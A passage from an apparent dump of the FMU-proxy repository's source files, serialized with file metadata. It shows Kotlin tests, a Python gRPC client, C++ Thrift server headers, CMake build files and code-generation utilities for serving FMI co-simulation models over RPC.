\"FMI_2.0/CoSimulation/win64/FMUSDK/2.0.4/BouncingBall/bouncingBall.fmu\"))\n modelDescription = fmu.modelDescription\n\n val handler = RpcHandler(RpcFmuService(fmu))\n proxy = FmuProxyBuilder(fmu).apply {\n addServer(FmuProxyJsonHttpServer(handler), httpPort)\n addServer(FmuProxyJsonWsServer(handler), wsPort)\n addServer(FmuProxyJsonTcpServer(handler), tcpPort)\n addServer(FmuProxyJsonZmqServer(handler), zmqPort)\n }.build().also { it.start() }\n\n }\n\n @AfterAll\n fun tearDown() {\n proxy.stop()\n fmu.close()\n }\n\n @Test\n fun testClients() {\n\n val clients = listOf(\n RpcWebSocketClient(\"localhost\", wsPort),\n RpcTcpClient(\"localhost\", tcpPort),\n RpcHttpClient(\"localhost\", httpPort),\n RpcZmqClient(\"localhost\", zmqPort)\n ).map { JsonRpcFmuClient(it) }\n\n clients.forEach { client ->\n\n LOG.info(\"Testing client of type ${client.client.javaClass.simpleName}\")\n Assertions.assertEquals(modelDescription.modelName, client.modelName)\n Assertions.assertEquals(modelDescription.guid, client.guid)\n\n client.newInstance().use { instance ->\n\n instance.init()\n Assertions.assertEquals(FmiStatus.OK, instance.lastStatus)\n\n val h = client.modelDescription.modelVariables\n .getByName(\"h\").asRealVariable()\n\n val dt = 1.0/100\n val stop = 100.0\n runInstance(instance, dt, stop, {\n h.read()\n }).also { LOG.info(\"Duration: ${it}ms\") }\n\n }\n\n }\n\n }\n\n}" }, { "alpha_fraction": 0.6969411969184875, "alphanum_fraction": 0.7016470432281494, "avg_line_length": 31.707693099975586, "blob_id": "861adcfb35390699e8303aa7d8420e173cc52e48", "content_id": "f73734c86f13c86a4ba937290f67b39c9d636df5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 2125, "license_type": "permissive", "max_line_length": 88, "num_lines": 65, "path": "/java/FMU-proxy/fmu-proxy-gen/src/main/resources/templates/server/Main.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to 
deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy\n\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\nimport java.util.Scanner\nimport no.mechatronics.sfi.fmuproxy.cli.CommandLineParser\nimport no.mechatronics.sfi.fmuproxy.grpc.GrpcFmuServer\nimport no.mechatronics.sfi.fmuproxy.grpc.{{fmuName}}Service\n\n\n/**\n *\n * @author Lars Ivar Hatledal\n */\nobject Main {\n\n private val LOG: Logger = LoggerFactory.getLogger(Main::class.java)\n\n @JvmStatic\n fun main(args: Array<String>) {\n\n val url = Main::class.java.classLoader.getResource(\"{{fmuName}}.fmu\")!!\n\n val _args = args + arrayOf(\"-fmu\", \"$url\")\n CommandLineParser.parse(_args)?.also { proxy ->\n\n proxy.getServer(GrpcFmuServer::class.java)?.addService({{fmuName}}Service())\n proxy.start()\n\n println(\"Press any key to exit..\")\n if (Scanner(System.`in`).hasNext()) {\n println(\"Exiting..\")\n }\n\n proxy.stop()\n\n }\n\n }\n\n}" }, { "alpha_fraction": 0.6552325487136841, "alphanum_fraction": 0.6589147448539734, "avg_line_length": 32.67320251464844, "blob_id": "5e15f25390d923f9f7bbeda5f5db0afcbef0693b", "content_id": "2f978ac24a1b789f84ba2ca6717987b7eb0f91c6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5160, "license_type": "permissive", "max_line_length": 81, "num_lines": 153, "path": "/python/grpc-client/client.py", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "import grpc\nfrom google.protobuf.empty_pb2 import Empty\nfrom definitions_pb2 import UInt\nfrom definitions_pb2 import InitRequest\nfrom definitions_pb2 import StepRequest\nfrom definitions_pb2 import ReadRequest\nfrom definitions_pb2 import IntRead\nfrom definitions_pb2 import RealRead\nfrom definitions_pb2 import StrRead\nfrom definitions_pb2 import BoolRead\nfrom definitions_pb2 import WriteIntRequest\nfrom definitions_pb2 import WriteRealRequest\nfrom definitions_pb2 import WriteStrRequest\nfrom definitions_pb2 import WriteBoolRequest\nfrom definitions_pb2 import Status\nfrom service_pb2_grpc import FmuServiceStub\n\n\nclass VariableReader:\n\n def __init__(self, fmu_id, value_reference, stub):\n self.stub = stub\n self.request = ReadRequest()\n self.request.fmu_id = fmu_id\n self.request.value_reference = value_reference\n\n def read_int(self) -> IntRead:\n return self.stub.ReadInteger(self.request)\n\n def read_real(self) -> RealRead:\n return self.stub.ReadReal(self.request)\n\n def read_string(self) -> StrRead:\n return self.stub.ReadString(self.request)\n\n def read_boolean(self) -> BoolRead:\n return 
self.stub.ReadBoolean(self.request)\n\n\nclass VariableWriter:\n\n    def __init__(self, fmu_id, value_reference, stub):\n        self.stub = stub\n        self.fmu_id = fmu_id\n        self.value_reference = value_reference\n\n    def write_int(self, value: int):\n        request = WriteIntRequest()\n        request.fmu_id = self.fmu_id\n        request.value_reference = self.value_reference\n        request.value = value\n        return self.stub.WriteInt(request)\n\n    def write_real(self, value: float):\n        request = WriteRealRequest()\n        request.fmu_id = self.fmu_id\n        request.value_reference = self.value_reference\n        request.value = value\n        return self.stub.WriteReal(request)\n\n    def write_string(self, value: str):\n        request = WriteStrRequest()\n        request.fmu_id = self.fmu_id\n        request.value_reference = self.value_reference\n        request.value = value\n        return self.stub.WriteString(request)\n\n    def write_boolean(self, value: bool):\n        request = WriteBoolRequest()\n        request.fmu_id = self.fmu_id\n        request.value_reference = self.value_reference\n        request.value = value\n        return self.stub.WriteBoolean(request)\n\n\nclass FmuInstance:\n\n    def __init__(self, stub: FmuServiceStub, model_description, integrator=None):\n        self.stub = stub\n        self.model_description = model_description\n\n        if integrator is None:\n            self.fmu_id = self.stub.CreateInstanceFromCS(Empty()).value\n        else:\n            self.fmu_id = self.stub.CreateInstanceFromME(integrator).value\n\n        self.model_variables = dict()\n        for v in self.model_description.model_variables:\n            self.model_variables[v.value_reference] = v\n\n    def get_current_time(self) -> float:\n        ref = UInt()\n        ref.value = self.fmu_id\n        return self.stub.GetCurrentTime(ref).value\n\n    def init(self, start=0.0, stop=0.0) -> bool:\n        request = InitRequest()\n        request.fmu_id = self.fmu_id\n        request.start = start\n        request.stop = stop\n        return self.stub.Init(request)\n\n    def step(self, step_size) -> Status:\n        request = StepRequest()\n        request.fmu_id = self.fmu_id\n        request.step_size = step_size\n        return self.stub.Step(request)\n\n    def terminate(self) -> bool:\n        request = UInt()\n        request.value = self.fmu_id\n        return self.stub.Terminate(request)\n\n    def reset(self) -> Status:\n        request = UInt()\n        request.value = self.fmu_id\n        return self.stub.Reset(request)\n\n    def get_reader(self, identifier) -> VariableReader:\n        if isinstance(identifier, int):\n            return VariableReader(self.fmu_id, identifier, self.stub)\n        elif isinstance(identifier, str):\n            value_reference = self.get_value_reference(identifier)\n            return VariableReader(self.fmu_id, value_reference, self.stub)\n        else:\n            raise ValueError('not a valid identifier: ' + identifier)\n\n    def get_writer(self, identifier) -> VariableWriter:\n        if isinstance(identifier, int):\n            return VariableWriter(self.fmu_id, identifier, self.stub)\n        elif isinstance(identifier, str):\n            value_reference = self.get_value_reference(identifier)\n            return VariableWriter(self.fmu_id, value_reference, self.stub)\n        else:\n            raise ValueError('not a valid identifier: ' + identifier)\n\n    def get_value_reference(self, var_name) -> int:\n        for key in self.model_variables:\n            if self.model_variables[key].name == var_name:\n                return key\n        return None\n\n\nclass FmuClient:\n\n    def __init__(self, host_address, port):\n        self._channel = grpc.insecure_channel(host_address + ':' + str(port))\n        self._stub = FmuServiceStub(self._channel)\n\n        self.model_description = self._stub.GetModelDescription(Empty())\n\n    def create_instance(self, integrator=None) -> FmuInstance:\n        return FmuInstance(self._stub, self.model_description, integrator)\n\n\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 
0.6616889834403992, "alphanum_fraction": 0.6714727282524109, "avg_line_length": 25.98611068725586, "blob_id": "fb1da3b7fb89a35599ecc4b18fa250cd931ab0f6", "content_id": "86924b6638e1046606124892bdff63103088b55a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 1942, "license_type": "permissive", "max_line_length": 104, "num_lines": 72, "path": "/java/FMU-proxy/fmu-proxy/src/test/kotlin/no/mechatronics/sfi/fmuproxy/avro/TestAvroTorsionBar.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "package no.mechatronics.sfi.fmuproxy.avro\n\nimport no.mechatronics.sfi.fmi4j.fmu.Fmu\nimport no.mechatronics.sfi.fmi4j.modeldescription.CommonModelDescription\nimport no.mechatronics.sfi.fmuproxy.TestUtils\nimport no.mechatronics.sfi.fmuproxy.runInstance\nimport org.junit.jupiter.api.AfterAll\nimport org.junit.jupiter.api.Assertions\nimport org.junit.jupiter.api.Test\nimport org.junit.jupiter.api.TestInstance\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\nimport java.io.File\n\n@TestInstance(TestInstance.Lifecycle.PER_CLASS)\nclass TestAvroTorsionBar {\n\n companion object {\n private val LOG: Logger = LoggerFactory.getLogger(TestAvroTorsionBar::class.java)\n }\n\n private val fmu: Fmu\n private val server: AvroFmuServer\n private val client: AvroFmuClient\n private val modelDescription: CommonModelDescription\n\n init {\n\n fmu = Fmu.from(File(TestUtils.getTEST_FMUs(),\n \"FMI_2.0/CoSimulation/${TestUtils.getOs()}/20sim/4.6.4.8004/TorsionBar/TorsionBar.fmu\"))\n modelDescription = fmu.modelDescription\n\n server = AvroFmuServer(fmu)\n val port = server.start()\n\n client = AvroFmuClient(\"localhost\", port)\n\n }\n\n @AfterAll\n fun tearDown() {\n client.close()\n server.close()\n fmu.close()\n }\n\n @Test\n fun testGuid() {\n val guid = client.modelDescription.guid.also { LOG.info(\"guid=$it\") }\n Assertions.assertEquals(modelDescription.guid, guid)\n }\n\n @Test\n fun testModelName() {\n val modelName = client.modelDescription.modelName.also { LOG.info(\"modelName=$it\") }\n Assertions.assertEquals(modelDescription.modelName, modelName)\n }\n\n @Test\n fun testInstance() {\n\n client.newInstance().use { instance ->\n val dt = 1E-3\n val stop = 2.0\n runInstance(instance, dt, stop).also {\n LOG.info(\"Duration=${it}ms\")\n }\n }\n\n }\n\n}" }, { "alpha_fraction": 0.6842105388641357, "alphanum_fraction": 0.6902370452880859, "avg_line_length": 34.57143020629883, "blob_id": "4dfe096cbf2a6a07cb922ac03834d5eddc0e829d", "content_id": "df56ee1981a18b7e43790757ca723644b5deb5fd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2489, "license_type": "permissive", "max_line_length": 113, "num_lines": 70, "path": "/cpp/FMU-proxy/common/FmuHelper.h", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies 
or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\n#ifndef FMU_PROXY_FMUHELPER_H\n#define FMU_PROXY_FMUHELPER_H\n\n#include <fmilib.h>\n#include <stdexcept>\n#include \"thrift-gen/definitions_types.h\"\n\nusing namespace std;\n\nnamespace fmuproxy {\n\n    void import_logger(jm_callbacks *c, jm_string module, jm_log_level_enu_t log_level, jm_string message) {\n        printf(\"module = %s, log level = %s: %s\\n\", module, jm_log_level_to_string(log_level), message);\n    }\n\n\n    jm_callbacks create_callbacks(jm_log_level_enu_t log_level = jm_log_level_debug) {\n        jm_callbacks callbacks;\n        callbacks.malloc = std::malloc;\n        callbacks.calloc = std::calloc;\n        callbacks.realloc = std::realloc;\n        callbacks.free = std::free;\n        callbacks.logger = import_logger;\n        callbacks.log_level = log_level;\n        callbacks.context = nullptr;\n        return callbacks;\n    }\n\n    fmi2_import_t *load_model_description(const char *tmp_path, fmi_xml_context_t *ctx, jm_callbacks callbacks) {\n\n        fmi2_import_t *xml = fmi2_import_parse_xml(ctx, tmp_path, nullptr);\n\n        if (!xml) {\n            throw std::runtime_error(\"Error parsing XML, exiting\");\n        }\n\n        if (fmi2_import_get_fmu_kind(xml) == fmi2_fmu_kind_me) {\n            throw std::runtime_error(\"Only CS 2.0 is supported by this code\");\n        }\n\n        return xml;\n\n    }\n    \n}\n\n#endif //FMU_PROXY_FMUHELPER_H" }, { "alpha_fraction": 0.7386621236801147, "alphanum_fraction": 0.7414966225624084, "avg_line_length": 33.52941131591797, "blob_id": "3bcb6ceefec3e9f1a1bdf806a36b9d1389d23887", "content_id": "d6860831dab4eb31ebf5c5a87d0fdcecb01b0d46", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 1764, "license_type": "permissive", "max_line_length": 56, "num_lines": 51, "path": "/cpp/FMU-proxy/CMakeLists.txt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "cmake_minimum_required(VERSION 3.10)\nproject(FMU-proxy)\n\nset(CMAKE_CXX_STANDARD 17)\n\nadd_executable(FmuTest\n        common/thrift-gen/definitions_types.cpp\n        common/thrift-gen/definitions_types.h\n        common/thrift-gen/service_types.h\n        common/FmuWrapper.cpp\n        common/FmuWrapper.h\n        test/FmuTest.cpp)\ntarget_link_libraries(FmuTest fmilib)\ntarget_link_libraries(FmuTest boost_system)\ntarget_link_libraries(FmuTest boost_filesystem)\ntarget_link_libraries(FmuTest dl)\n\n\nadd_executable(ThriftServerTest\n        common/thrift-gen/definitions_types.cpp\n        common/thrift-gen/definitions_types.h\n        common/thrift-gen/service_types.h\n        common/thrift-gen/FmuService.cpp\n        common/thrift-gen/FmuService.h\n        common/ThriftHelper.h\n        common/FmuWrapper.cpp\n        common/FmuWrapper.h\n        common/FmuHelper.h\n        server/FmuServiceHandler.h\n        server/FmuServiceHandler.cpp\n        server/ThriftServer.h\n        server/ThriftServer.cpp\n        test/ThriftServerTest.cpp)\ntarget_link_libraries(ThriftServerTest thrift)\ntarget_link_libraries(ThriftServerTest fmilib)\ntarget_link_libraries(ThriftServerTest pthread)\ntarget_link_libraries(ThriftServerTest boost_system)\ntarget_link_libraries(ThriftServerTest boost_filesystem)\ntarget_link_libraries(ThriftServerTest 
dl)\n\nadd_executable(ThriftClientTest\n common/thrift-gen/definitions_types.cpp\n common/thrift-gen/definitions_types.h\n common/thrift-gen/service_types.h\n common/thrift-gen/FmuService.cpp\n common/thrift-gen/FmuService.h\n client/ThriftClient.cpp\n client/ThriftClient.h\n test/ThriftClientTest.cpp)\ntarget_link_libraries(ThriftClientTest thrift)\ntarget_link_libraries(ThriftClientTest fmilib)\n\n\n\n" }, { "alpha_fraction": 0.6906585097312927, "alphanum_fraction": 0.6931087374687195, "avg_line_length": 35.685394287109375, "blob_id": "37eae52b9bbf2b34458eebf1e818094c24201ecd", "content_id": "655b36e9bdb13bc06e1180ad0e8967ec1bb79e9e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3265, "license_type": "permissive", "max_line_length": 125, "num_lines": 89, "path": "/cpp/FMU-proxy/server/FmuServiceHandler.h", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "//\n// Created by laht on 07.06.18.\n//\n\n#ifndef FMU_PROXY_FMUSERVICEHANDLER_H\n#define FMU_PROXY_FMUSERVICEHANDLER_H\n\n#include <iostream>\n\n#include \"../common/thrift-gen/FmuService.h\"\n#include \"../common/FmuWrapper.h\"\n\n\nusing namespace std;\nusing namespace ::fmuproxy::thrift;\n\n\nnamespace fmuproxy {\n namespace server {\n\n class FmuServiceHandler : virtual public FmuServiceIf {\n\n private:\n shared_ptr<FmuWrapper> fmu;\n map<FmuId, shared_ptr<FmuInstance>> fmus;\n\n public:\n FmuServiceHandler(shared_ptr<FmuWrapper> fmu);\n\n void getModelDescriptionXml(std::string &_return) override;\n\n void getModelDescription(ModelDescription &_return) override;\n\n FmuId createInstanceFromCS() override;\n\n FmuId createInstanceFromME(const Solver &solver) override;\n\n bool canGetAndSetFMUstate(const FmuId fmu_id) override;\n\n double getCurrentTime(const FmuId fmu_id) override;\n\n bool isTerminated(const FmuId fmu_id) override;\n\n Status::type init(const FmuId fmu_id, const double start, const double stop) override;\n\n void step(StepResult &_return, const FmuId fmu_id, const double step_size) override;\n\n Status::type terminate(const FmuId fmu_id) override;\n\n Status::type reset(const FmuId fmu_id) override;\n\n void readInteger(IntegerRead &_return, const FmuId fmu_id, const ValueReference vr) override;\n\n void bulkReadInteger(IntegerArrayRead &_return, const FmuId fmu_id, const ValueReferences &vr) override;\n\n void readReal(RealRead &_return, const FmuId fmu_id, const ValueReference vr) override;\n\n void bulkReadReal(RealArrayRead &_return, const FmuId fmu_id, const ValueReferences &vr) override;\n\n void readString(StringRead &_return, const FmuId fmu_id, const ValueReference vr) override;\n\n void bulkReadString(StringArrayRead &_return, const FmuId fmu_id, const ValueReferences &vr) override;\n\n void readBoolean(BooleanRead &_return, const FmuId fmu_id, const ValueReference vr) override;\n\n void bulkReadBoolean(BooleanArrayRead &_return, const FmuId fmu_id, const ValueReferences &vr) override;\n\n Status::type writeInteger(const FmuId fmu_id, const ValueReference vr, const int32_t value) override;\n\n Status::type bulkWriteInteger(const FmuId fmu_id, const ValueReferences &vr, const IntArray &value) override;\n\n Status::type writeReal(const FmuId fmu_id, const ValueReference vr, const double value) override;\n\n Status::type bulkWriteReal(const FmuId fmu_id, const ValueReferences &vr, const RealArray &value) override;\n\n Status::type writeString(const FmuId fmu_id, const ValueReference vr, const std::string &value) 
override;\n\n Status::type bulkWriteString(const FmuId fmu_id, const ValueReferences &vr, const StringArray &value) override;\n\n Status::type writeBoolean(const FmuId fmu_id, const ValueReference vr, const bool value) override;\n\n Status::type bulkWriteBoolean(const FmuId fmu_id, const ValueReferences &vr, const BooleanArray &value) override;\n\n };\n\n }\n}\n\n#endif //FMU_PROXY_FMUSERVICEHANDLER_H\n" }, { "alpha_fraction": 0.6199377179145813, "alphanum_fraction": 0.6236760020256042, "avg_line_length": 38.79338836669922, "blob_id": "5d69c515a44d98a1627d5f99d7b89ecd5585399a", "content_id": "2ebcf6842f7ff5b1ae10b4fdc142ca11616c3967", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 4815, "license_type": "permissive", "max_line_length": 120, "num_lines": 121, "path": "/java/FMU-proxy/fmu-proxy-gen/src/main/kotlin/no/mechatronics/sfi/fmuproxy/codegen/ServerGen.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy.codegen\n\nimport no.mechatronics.sfi.fmi4j.modeldescription.CommonModelDescription\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.*\nimport no.mechatronics.sfi.fmuproxy.KOTLIN_SRC_OUTPUT_FOLDER\nimport no.mechatronics.sfi.fmuproxy.PACKAGE_NAME\nimport no.mechatronics.sfi.fmuproxy.utils.FileFuture\nimport no.mechatronics.sfi.fmuproxy.utils.getProtoType\nimport no.mechatronics.sfi.fmuproxy.utils.isArray\nimport org.jtwig.JtwigModel\nimport org.jtwig.JtwigTemplate\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\nimport java.io.File\n\n/**\n *\n * @author Lars Ivar Hatledal\n */\nprivate val TypedScalarVariable<*>.typeName: String\n get() = when(this) {\n is IntegerVariable -> INTEGER_TYPE\n is RealVariable -> REAL_TYPE\n is StringVariable -> STRING_TYPE\n is BooleanVariable -> BOOLEAN_TYPE\n is EnumerationVariable -> ENUMERATION_TYPE\n else -> throw IllegalStateException(\"$this is not a valid variable type..\")\n }\n\n/**\n *\n * @author Lars Ivar Hatledal\n */\nobject ServerGen {\n\n private val LOG: Logger = LoggerFactory.getLogger(ServerGen::class.java)\n\n fun generateServerCode(modelDescription: CommonModelDescription, baseFile: File) {\n\n val packageName = PACKAGE_NAME.replace(\".\", \"/\")\n val ktOut = File(baseFile, \"${KOTLIN_SRC_OUTPUT_FOLDER}/$packageName\")\n\n val dynamicMethods = StringBuilder().apply {\n modelDescription.modelVariables.forEach {\n\n if (!isArray(it.name)) {\n\n append(JtwigTemplate.classpathTemplate(\"templates/server/Read.kt\").let { template ->\n template.render(JtwigModel.newModel()\n .with(\"valueReference\", it.valueReference)\n .with(\"varName\", convertName2(it.name))\n .with(\"typeName\", it.typeName)\n .with(\"returnType\", \"${getProtoType(it)}Read\"))!!\n }).append(\"\\n\")\n\n append(JtwigTemplate.classpathTemplate(\"templates/server/Write.kt\").let { template ->\n template.render(JtwigModel.newModel()\n .with(\"valueReference\", it.valueReference)\n .with(\"varName\", convertName2(it.name))\n .with(\"typeName\", it.typeName)\n .with(\"dataType\", getProtoType(it)))!!\n })\n\n }\n\n }\n }\n\n FileFuture(\n name = \"Main.kt\",\n text = JtwigTemplate.classpathTemplate(\"templates/server/Main.kt\").let { template ->\n template.render(JtwigModel.newModel()\n .with(\"fmuName\", modelDescription.modelName))!!\n }\n ).create(ktOut)\n\n FileFuture(\n name = \"${modelDescription.modelName}Service.kt\",\n text = JtwigTemplate.classpathTemplate(\"templates/server/Service.kt\").let { template ->\n template.render(JtwigModel.newModel()\n .with(\"fmuName\", modelDescription.modelName)\n .with(\"dynamicMethods\", dynamicMethods))!!\n }\n ).create(ktOut)\n\n }\n\n private fun convertName2(str: String): String {\n val split = str.replace(\"_\".toRegex(), \".\").split(\"\\\\.\".toRegex()).dropLastWhile { it.isEmpty() }.toTypedArray()\n return StringBuilder().apply {\n for (s in split) {\n append(s.substring(0, 1).toUpperCase()).append(s.substring(1))\n }\n }.toString()\n }\n\n}\n" }, { "alpha_fraction": 0.7087666988372803, "alphanum_fraction": 0.7127290964126587, "avg_line_length": 32.61666488647461, "blob_id": "235526cbcee62a8d7671aee915867d98e74dca42", "content_id": "5a4102713ad97c48a8e0b91c2314c97902f714f6", 
"detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 2019, "license_type": "permissive", "max_line_length": 125, "num_lines": 60, "path": "/java/FMU-proxy/fmu-proxy-gen/src/main/kotlin/no/mechatronics/sfi/fmuproxy/ApplicationStarter.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy\n\nimport picocli.CommandLine\nimport java.io.File\n\n/**\n *\n * @author Lars Ivar Hatledal\n */\nobject ApplicationStarter {\n\n @JvmStatic\n fun main(args: Array<String>) {\n CommandLine.run(Args(), System.out, *args)\n }\n\n}\n\[email protected](name = \"fmu-proxy-gen\")\nclass Args: Runnable {\n\n @CommandLine.Option(names = [\"-h\", \"--help\"], description = [\"Prints this message and quits.\"], usageHelp = true)\n var helpRequested = false\n\n @CommandLine.Option(names = [\"-fmu\", \"--fmuPath\"], description = [\"Path to the fmu.\"], required = true)\n lateinit var fmuPath: File\n\n @CommandLine.Option(names = [\"-out\", \"--output\"], description = [\"Specify where to copy the generated .jar (optional).\"])\n var out: File? = null\n\n override fun run() {\n\n ExecutableGenerator(fmuPath).generate(out)\n\n }\n}\n\n\n" }, { "alpha_fraction": 0.72469562292099, "alphanum_fraction": 0.7296720743179321, "avg_line_length": 44.93061065673828, "blob_id": "d427c7e5fbbd5d915606ca167d280da23eb5a6c6", "content_id": "690605f2f9b0140917bd36c43be870c226a7cde4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 22506, "license_type": "permissive", "max_line_length": 86, "num_lines": 490, "path": "/python/grpc-client/service_pb2_grpc.py", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "# Generated by the gRPC Python protocol compiler plugin. 
DO NOT EDIT!\nimport grpc\n\nimport definitions_pb2 as definitions__pb2\nfrom google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2\n\n\nclass FmuServiceStub(object):\n # missing associated documentation comment in .proto file\n pass\n\n def __init__(self, channel):\n \"\"\"Constructor.\n\n Args:\n channel: A grpc.Channel.\n \"\"\"\n self.GetModelDescriptionXml = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/GetModelDescriptionXml',\n request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,\n response_deserializer=definitions__pb2.Str.FromString,\n )\n self.GetModelDescription = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/GetModelDescription',\n request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,\n response_deserializer=definitions__pb2.ModelDescription.FromString,\n )\n self.CreateInstanceFromCS = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/CreateInstanceFromCS',\n request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,\n response_deserializer=definitions__pb2.UInt.FromString,\n )\n self.CreateInstanceFromME = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/CreateInstanceFromME',\n request_serializer=definitions__pb2.Solver.SerializeToString,\n response_deserializer=definitions__pb2.UInt.FromString,\n )\n self.GetCurrentTime = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/GetCurrentTime',\n request_serializer=definitions__pb2.UInt.SerializeToString,\n response_deserializer=definitions__pb2.Real.FromString,\n )\n self.IsTerminated = channel.unary_unary(\n 